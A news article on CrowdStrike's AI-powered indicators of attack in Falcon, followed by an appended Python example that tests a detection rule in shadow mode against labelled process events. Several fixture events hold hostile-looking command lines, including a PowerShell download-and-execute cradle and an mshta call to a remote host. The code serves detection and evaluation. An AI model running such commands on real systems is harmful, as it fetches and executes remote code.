The new feature leverages millions of examples of malicious activity to more accurately identify signs of an attack.

Cybersecurity vendor CrowdStrike has added new AI-powered indicators of attack (IoA) functionality to its Falcon platform. Announced at the Black Hat USA 2022 conference, the enhancement uses AI techniques to create new IoAs at machine speed and scale, which the firm said helps organizations stop emerging attack techniques and optimize detection and response.

AI IoAs trained on real-world adversary behavior, rich threat intelligence

In a press release, CrowdStrike stated that Falcon now allows organizations to find emerging attack techniques with IoAs created by AI models trained on real-world adversary behavior and rich threat intelligence. Brian Trombley, vice president of product management, endpoint security at CrowdStrike, tells CSO that the AI-powered IoAs draw on intelligence from the CrowdStrike Security Cloud, where the firm collects over one trillion security events per day from its customer base.

“We correlate this telemetry using machine learning to create new IoAs,” Trombley adds. “Human threat experts then create a corpus of behaviors ranging from hundreds of thousands to millions of examples of clean and malicious activity, before data scientists begin the process of turning telemetry into an AI or ML model that powers the creation of new IoAs. All IoAs, including AI-powered IoAs, are delivered to the Falcon agent in the same fashion, working alongside our sensor ML models.
The AI-powered IoA technology is highly flexible and can be used to model on any event data captured by the CrowdStrike Falcon platform.”

AI-powered IoAs tested against rich field telemetry, crafted kill chains

CrowdStrike’s models are calibrated against an ever-expanding body of expert-generated ground truth aggregated across the Falcon platform, spanning intelligence from CrowdStrike’s Managed Threat Hunting (Falcon OverWatch), Malware Research Center (MRC), and Managed Detection and Response (Falcon Complete) teams, Trombley tells CSO. “To test the accuracy of the AI-powered IoAs, CrowdStrike’s threat hunters and researchers evaluate the models against this rich field telemetry and specifically crafted kill chains.” This ensures that the models are resistant to adversarial ML attacks, can detect malicious tactics, techniques and procedures (TTPs), and generate low false positive detections against real-world customer data, Trombley says. “Additionally, prior to enabling live detections, in order to minimize customer exposure to false positives, the models are run silently to allow subject matter experts to meticulously evaluate detections and tune for best performance in-field.”

CrowdStrike strives to minimize false positives and false negatives, as they leave security teams struggling to sift through yet more noise instead of stopping breaches, Trombley says. “We used this same testing capability to test and tune our AI-powered IoAs as well. During our testing, we identified over 20 new adversary patterns, which were confirmed by Falcon OverWatch’s elite threat hunters.
Over the same period, our new models collectively identified less than ten false positives and have continued to perform at this level of fidelity since moving into general availability.”
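The silent-run-then-promote workflow Trombley describes is worth seeing end to end. The following is an added example, not CrowdStrike code and not the Falcon platform's logic: it runs a first-cut behavioural rule and a tuned variant in shadow mode over a handful of constructed, analyst-labelled process-creation events, tallies the confusion matrix, and applies a promotion gate before either rule is allowed to raise live detections. The event fields, both rules, the nine sample events and the gate thresholds (zero false positives, at least 90% recall) are all assumptions made for illustration.

```python
"""Shadow-mode evaluation gate for a candidate behavioural indicator of attack.

Constructed example: the event records, the two rules and the promotion
thresholds are assumptions made for illustration, not CrowdStrike's.
"""
from dataclasses import dataclass
from typing import Callable, Iterable


@dataclass(frozen=True)
class Event:
    """One process-creation record with an expert-assigned ground-truth label."""
    host: str
    parent: str      # parent process image name
    image: str       # spawned process image name
    cmdline: str     # spawned process command line
    label: str       # "malicious" or "clean", assigned by analysts


# Constructed telemetry standing in for analyst-labelled field data.
EVENTS = [
    Event("ws01", "winword.exe", "powershell.exe", "powershell -nop -w hidden -enc SQBFAFgA", "malicious"),
    Event("ws02", "excel.exe", "powershell.exe", "powershell -ExecutionPolicy Bypass -File C:\\Finance\\refresh.ps1", "clean"),
    Event("ws03", "outlook.exe", "mshta.exe", "mshta http://198.51.100.7/a.hta", "malicious"),
    Event("ws04", "explorer.exe", "powershell.exe", "powershell Get-ChildItem C:\\Logs", "clean"),
    Event("ws05", "winword.exe", "wscript.exe", "wscript C:\\Users\\bob\\AppData\\Local\\Temp\\invoice.js", "malicious"),
    Event("ws06", "excel.exe", "powershell.exe", "powershell -File \\\\fileserver\\scripts\\monthclose.ps1", "clean"),
    Event("ws07", "winword.exe", "powershell.exe", "powershell -c IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/p')", "malicious"),
    Event("ws08", "services.exe", "svchost.exe", "svchost -k netsvcs", "clean"),
    Event("ws09", "outlook.exe", "excel.exe", "excel C:\\Users\\bob\\Downloads\\Q3.xlsx", "clean"),
]

OFFICE = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def candidate_ioa(e: Event) -> bool:
    """First-cut rule: any Office application spawning a script host."""
    return e.parent.lower() in OFFICE and e.image.lower() in SCRIPT_HOSTS


def tuned_ioa(e: Event) -> bool:
    """Tuned rule: same parent/child pair, plus at least one suspicious
    command-line trait, so routine finance automation no longer fires."""
    if not candidate_ioa(e):
        return False
    cmd = e.cmdline.lower()
    encoded = " -enc" in cmd or " -encodedcommand" in cmd
    remote = "http://" in cmd or "https://" in cmd
    user_writable = "\\appdata\\" in cmd or "\\temp\\" in cmd
    return encoded or remote or user_writable


def evaluate(events: Iterable[Event], detector: Callable[[Event], bool]) -> dict:
    """Run the detector silently over labelled events: no alert is raised,
    each outcome is only tallied against the analyst label."""
    counts = {"tp": 0, "fp": 0, "fn": 0, "tn": 0}
    for e in events:
        fired = detector(e)
        malicious = e.label == "malicious"
        if fired and malicious:
            counts["tp"] += 1
        elif fired:
            counts["fp"] += 1
        elif malicious:
            counts["fn"] += 1
        else:
            counts["tn"] += 1
    tp, fp, fn, tn = counts["tp"], counts["fp"], counts["fn"], counts["tn"]
    counts["precision"] = tp / (tp + fp) if tp + fp else 0.0
    counts["recall"] = tp / (tp + fn) if tp + fn else 0.0
    counts["fpr"] = fp / (fp + tn) if fp + tn else 0.0
    return counts


def promote(metrics: dict, max_fp: int = 0, min_recall: float = 0.9) -> bool:
    """Promotion gate (thresholds are assumptions): a rule goes live only if
    the shadow run stayed within the false-positive budget and kept recall."""
    return metrics["fp"] <= max_fp and metrics["recall"] >= min_recall


if __name__ == "__main__":
    for name, rule in (("candidate", candidate_ioa), ("tuned", tuned_ioa)):
        m = evaluate(EVENTS, rule)
        print(f"{name}: {m}  promote={promote(m)}")
```

Running the module prints both rules' metrics. The first-cut rule fires on legitimate finance automation launched from Excel (two false positives on the sample set) and is held back by the gate; the tuned rule, which additionally requires an encoded command, a URL or a user-writable path on the command line, keeps full recall with no false positives and clears it. In a real pipeline the labelled corpus would be far larger, the gate would be run over a fixed soak period rather than a single pass, and false negatives would be tracked over time as new adversary patterns are confirmed.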